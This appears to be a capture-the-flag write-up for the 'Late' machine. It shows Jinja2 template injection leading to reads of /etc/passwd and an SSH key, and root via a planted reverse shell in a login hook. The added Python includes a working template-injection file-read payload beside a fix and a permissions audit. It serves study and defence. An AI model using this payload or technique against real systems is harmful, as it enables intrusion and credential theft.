bikupothen1615

#Late


SCANNING


Initial recon stage:

An nmap scan showed two open ports: 22 (SSH) and 80 (HTTP).


Browsing to port 80 showed the default web page. That page links to a second page, which runs on the Flask framework.


FOOTHOLD


Flask renders its pages with the Jinja2 template engine. After some research we found that an application which passes user-supplied text into a template this way is vulnerable to Server-Side Template Injection (SSTI).

To check, we wrote a simple arithmetic expression (something like {{7*7}}) on an image and uploaded the file. The page came back with the evaluated answer instead of the expression, which confirmed that our input was being rendered as a template and that SSTI was possible.

With some deeper research we built payloads and uploaded them the same way. We were able to read /etc/passwd, which gave us the user name, and then read that user's SSH private key, which let us log in over SSH (port 22) as that user.
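The root cause of the foothold, as an added example that is not code from the original writeup or from the target application: a template whose source contains user text evaluates any {{ ... }} in that text, while a constant template that receives the text as a value does not. The function names, the SandboxedEnvironment check and the constructed stand-in file used instead of /etc/passwd are this example's own assumptions; the real upload-and-OCR application on the box is not reproduced here.

```python
"""Added example (not the writeup's or the target application's code):
why pasting user text into a Jinja2 template source is exploitable, the
arithmetic canary used to confirm it, and two ways to close the hole."""
import os
import tempfile

from jinja2 import Template
from jinja2.sandbox import SandboxedEnvironment

CANARY = "{{7*7}}"  # harmless arithmetic; a rendered "49" proves evaluation


def vulnerable_render(user_text):
    """Anti-pattern: user text becomes part of the template *source*."""
    return Template("<p>Result: " + user_text + "</p>").render()


def safe_render(user_text):
    """Fix: the template is constant; user text is only a rendered *value*."""
    return Template("<p>Result: {{ text }}</p>").render(text=user_text)


def sandboxed_render(user_text):
    """Defence in depth: even with a tainted source, the sandbox refuses
    underscore attributes such as __init__ / __globals__."""
    env = SandboxedEnvironment()
    try:
        return env.from_string("<p>Result: " + user_text + "</p>").render()
    except Exception as exc:  # jinja2.sandbox.SecurityError in practice
        return "blocked: " + type(exc).__name__


def is_injectable(render):
    """Attacker-side check mirroring the arithmetic test in the writeup."""
    return "49" in render(CANARY)


def file_read_payload(path):
    """Reach Python builtins through the template's own object graph.
    Against the real application the path would be /etc/passwd."""
    return ("{{ self.__init__.__globals__.__builtins__.open('"
            + path + "').read() }}")


def demo():
    """Run every variant against a constructed stand-in for /etc/passwd."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as fh:
        fh.write("ctfuser:x:1000:1000::/home/ctfuser:/bin/bash\n")  # constructed
    try:
        return {
            "vulnerable": is_injectable(vulnerable_render),
            "safe": is_injectable(safe_render),
            "leak": "ctfuser:x:1000" in vulnerable_render(file_read_payload(path)),
            "sandbox": sandboxed_render(file_read_payload(path)),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

The canary is the cheapest possible test: if {{7*7}} comes back as 49 the input was parsed as template syntax, and the file-read payload then works with the same delivery channel. Note that the sandboxed environment is a second line of defence only; the real fix is never building template source from user input.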






PRIVILEGE ESCALATION


To get root we ran linpeas.sh to look for known vulnerabilities. It found none, but it did flag a suspicious file location. We went there and read the files: the script there sends root a mail every time a new successful login is detected.


We copied the script, changed the recipient variable to our own user name, and placed the copy in the same directory, so that the next login would mail our user as well. It was only a try, but it worked.



With that confirmed, we added our changes to the original script together with a bash reverse-shell command and started a netcat listener. The next login triggered the script and we got a connection back as root.
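The condition this escalation depends on, as an added example that is not code from the original writeup: a script that root runs on every login is only a privilege-escalation path if a low-privilege user can edit it or plant a file beside it. The audit below reports exactly those conditions and scans whole directories for them, the manual equivalent of the look that turned up the hook. The directory layout and the sample hook are constructed for the demo; the real hook location on the box is not reproduced here.

```python
"""Added example (not the writeup's code): audit root-executed hook scripts
for the permission weaknesses that turn them into a privesc path."""
import os
import shutil
import stat
import tempfile


def non_owner_writable(path):
    """True if group or 'other' hold write permission on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_hook(path):
    """Findings that make a root-executed hook script abusable."""
    findings = []
    st = os.stat(path)
    if st.st_uid != 0:
        findings.append("owner uid %d is not root" % st.st_uid)
    if non_owner_writable(path):
        findings.append("script is group/world writable")
    if non_owner_writable(os.path.dirname(path)):
        findings.append("directory is group/world writable, so a sibling "
                        "script can be planted")
    return findings


def scan(dirs):
    """Audit every executable regular file below the given directories."""
    report = {}
    for top in dirs:
        for root, _, files in os.walk(top):
            for name in files:
                path = os.path.join(root, name)
                if os.path.isfile(path) and os.access(path, os.X_OK):
                    findings = audit_hook(path)
                    if findings:
                        report[path] = findings
    return report


def demo():
    """Build a weak and a hardened layout in a temp dir and audit both."""
    base = tempfile.mkdtemp()
    try:
        hooks = {}
        # Constructed sample layouts: (label, directory mode, script mode).
        for label, dir_mode, file_mode in (("weak", 0o777, 0o777),
                                           ("hardened", 0o755, 0o755)):
            d = os.path.join(base, label)
            os.mkdir(d, 0o700)
            hook = os.path.join(d, "login-alert.sh")  # placeholder name
            with open(hook, "w") as fh:
                fh.write("#!/bin/sh\n# mail root about a new login\n")
            os.chmod(hook, file_mode)
            os.chmod(d, dir_mode)
            hooks[label] = hook
        result = {label: audit_hook(p) for label, p in hooks.items()}
        result["scan"] = scan([base])
        return result
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The hardened layout (root-owned, 0755 script in a 0755 directory) produces no writability findings even though the script still runs as root on every login. When a hook turns out not to be writable, check the directory it lives in before giving up: being able to plant a sibling script, as above, is the same weakness in a different place.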



PWNED.!!!
